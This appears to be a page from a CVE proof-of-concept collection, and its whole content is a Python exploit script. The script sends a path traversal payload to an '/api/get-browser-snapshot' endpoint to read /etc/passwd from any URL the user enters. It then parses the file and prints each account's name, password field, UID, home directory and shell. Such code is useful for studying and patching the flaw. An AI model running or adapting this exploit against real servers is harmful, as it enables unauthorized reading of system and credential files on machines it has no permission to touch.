4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3.11
import requests
import re

def exploit(url):
    if not url.startswith("http"):
        target = "http://" + url + "/api/get-browser-snapshot"
    else:
        target = url + "/api/get-browser-snapshot"

    payload = {"snapshot_path": "../../../../../../etc/passwd"}
    
    try:
        response = requests.get(target, params=payload)
        response.raise_for_status()
        
    except requests.RequestException as e:
        print("Request failed...")
        print(str(e))

    passwd_pattern = re.compile(r"^([a-zA-Z0-9._-]+):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$")
    contents = passwd_pattern.findall(response.text)
    for match in contents:
        user, password, uid, gid, comment, home, shell = match
        print("User: " + user)
        print("Password: " + password)
        print("UID: " + uid)
        print("GID: " + gid)
        print("Comment: " + comment)
        print("Home Directory: " + home)
        print("Shell: " + shell)
        print("----")

if __name__ == "__main__":
    url = input("Enter vulnerable url: ")
    exploit(url)